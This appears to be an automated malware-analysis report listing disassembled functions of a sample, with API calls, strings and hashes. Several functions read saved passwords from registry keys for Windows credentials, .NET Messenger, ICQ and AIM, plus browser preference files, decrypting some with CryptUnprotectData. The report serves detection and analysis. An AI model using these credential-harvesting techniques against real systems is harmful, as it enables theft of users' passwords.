                                                                                                    Function 00408EAA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sprintf.MSVCRT ref: 00408ECB
                                                                                                    • LoadMenuA.USER32(?,?), ref: 00408ED9
                                                                                                      • Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
                                                                                                      • Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
                                                                                                      • Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
                                                                                                      • Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF
                                                                                                    • DestroyMenu.USER32(00000000), ref: 00408EF7
                                                                                                    • sprintf.MSVCRT ref: 00408F3B
                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
                                                                                                    • memset.MSVCRT ref: 00408F6C
                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
                                                                                                    • EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
                                                                                                    • DestroyWindow.USER32(00000000), ref: 00408FAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                    • Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                                                                                    • Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
                                                                                                    • Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                                                                                    • Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409068, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT ref: 00409080
                                                                                                    • _mbscpy.MSVCRT ref: 00409090
                                                                                                      • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
                                                                                                      • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
                                                                                                      • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
                                                                                                    • _mbscpy.MSVCRT ref: 004090E3
                                                                                                    • memset.MSVCRT ref: 004090FF
                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
                                                                                                      • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                    • String ID: TranslatorName$TranslatorURL$Version$general$strings
                                                                                                    • API String ID: 1035899707-2179912348
                                                                                                    • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                                                                                    • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
                                                                                                    • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                                                                                    • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041102B, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                    • API String ID: 667068680-3953557276
                                                                                                    • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                                                                                    • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
                                                                                                    • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                                                                                    • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004100A4, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 117registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                                                                                    • memset.MSVCRT ref: 004100EA
                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
                                                                                                    • LocalFree.KERNEL32(?), ref: 004101C5
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004101D0
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004101F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                    • String ID: Creds$ps:password
                                                                                                    • API String ID: 551151806-1872227768
                                                                                                    • Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                                                                                    • Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
                                                                                                    • Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                                                                                    • Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405C4E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
                                                                                                    • MapDialogRect.USER32(?,?), ref: 00405C7D
                                                                                                    • memset.MSVCRT ref: 00405D4B
                                                                                                    • sprintf.MSVCRT ref: 00405D6E
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00405D83
                                                                                                    • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
                                                                                                    • String ID: %s:$SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 2601263068-2802052640
                                                                                                    • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                                                                                    • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
                                                                                                    • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                                                                                    • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411BA1, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63librarystringloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                                                                                    • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                                                                                    • strlen.MSVCRT ref: 00411C15
                                                                                                    • strlen.MSVCRT ref: 00411C22
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcstrlen
                                                                                                    • String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
                                                                                                    • API String ID: 1027343248-251837621
                                                                                                    • Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                                                                                    • Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
                                                                                                    • Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                                                                                    • Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004121C1, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy
                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                    • API String ID: 714388716-318151290
                                                                                                    • Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                                                                                    • Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
                                                                                                    • Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                                                                                    • Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E293, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 167fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
                                                                                                    • memset.MSVCRT ref: 0040E2F2
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
                                                                                                    • memcpy.MSVCRT ref: 0040E3AC
                                                                                                    • memcpy.MSVCRT ref: 0040E3CB
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E4A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
                                                                                                    • String ID: .aim.session.password$user_pref("
                                                                                                    • API String ID: 1009687194-2166142864
                                                                                                    • Opcode ID: 3301c009570dabdb8578617bf93d6c7150b1ff8625c9e7c5bf5b825b8a4131d0
                                                                                                    • Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
                                                                                                    • Opcode Fuzzy Hash: 3301c009570dabdb8578617bf93d6c7150b1ff8625c9e7c5bf5b825b8a4131d0
                                                                                                    • Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D794, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 122registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                    • atoi.MSVCRT ref: 0040D840
                                                                                                    • memset.MSVCRT ref: 0040D869
                                                                                                    • _mbscpy.MSVCRT ref: 0040D8B3
                                                                                                    • _mbscpy.MSVCRT ref: 0040D8C6
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                    • memset.MSVCRT ref: 0040D7DC
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
                                                                                                    • String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
                                                                                                    • API String ID: 2897902629-2277304809
                                                                                                    • Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                                                                                    • Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
                                                                                                    • Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                                                                                    • Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411172, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strchr.MSVCRT ref: 0041118A
                                                                                                    • _mbscpy.MSVCRT ref: 00411198
                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                                                                                      • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                                                                                    • _mbscpy.MSVCRT ref: 004111E8
                                                                                                    • _mbscat.MSVCRT ref: 004111F3
                                                                                                    • memset.MSVCRT ref: 004111CF
                                                                                                      • Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                                                                                      • Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8
                                                                                                    • memset.MSVCRT ref: 00411217
                                                                                                    • memcpy.MSVCRT ref: 00411232
                                                                                                    • _mbscat.MSVCRT ref: 0041123D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 912701516-1821301763
                                                                                                    • Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                                                                                    • Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
                                                                                                    • Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                                                                                    • Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004068B5, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004068BF
                                                                                                      • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 004068FA
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 0040691C
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406925
                                                                                                    • GetLastError.KERNEL32 ref: 0040692D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406939
                                                                                                    • GetLastError.KERNEL32 ref: 00406944
                                                                                                    • CloseClipboard.USER32 ref: 0040694D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                    • String ID:
                                                                                                    • API String ID: 2565263379-0
                                                                                                    • Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                                                                                    • Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
                                                                                                    • Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                                                                                    • Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004088D4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 3540791495-3849865405
                                                                                                    • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                                                                                    • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
                                                                                                    • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                                                                                    • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C1E0, Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040C259
                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040C267
                                                                                                    • SelectObject.GDI32(?,?), ref: 0040C27C
                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040C2BD
                                                                                                      • Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
                                                                                                      • Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
                                                                                                      • Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066
                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040C2DE
                                                                                                    • SetCursor.USER32(00000000), ref: 0040C2E5
                                                                                                    • SetFocus.USER32(?), ref: 0040C33A
                                                                                                    • SetFocus.USER32(?), ref: 0040C394
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
                                                                                                    • String ID:
                                                                                                    • API String ID: 4166086388-0
                                                                                                    • Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                                                                                    • Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
                                                                                                    • Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                                                                                    • Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004037A2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4288758904-3916222277
                                                                                                    • Opcode ID: 36022106369bdb0d34297d299049715864e583c469c52662bdcd1600095dd280
                                                                                                    • Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
                                                                                                    • Opcode Fuzzy Hash: 36022106369bdb0d34297d299049715864e583c469c52662bdcd1600095dd280
                                                                                                    • Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FE5D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 99registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,7661E520,00000000), ref: 0040FE8C
                                                                                                    • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    • memcpy.MSVCRT ref: 0040FEFE
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040FF79
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                                                                                    • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                    • API String ID: 2372935584-105384665
                                                                                                    • Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                                                                                    • Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
                                                                                                    • Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                                                                                    • Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404D7A, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                                                                                    • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                                                                                    • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                                                                                    • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406735, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
                                                                                                    • strlen.MSVCRT ref: 00406785
                                                                                                    • _mbscpy.MSVCRT ref: 00406795
                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
                                                                                                    • _mbscpy.MSVCRT ref: 004067AF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 2881943006-572158859
                                                                                                    • Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                                                                                    • Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
                                                                                                    • Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                                                                                    • Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

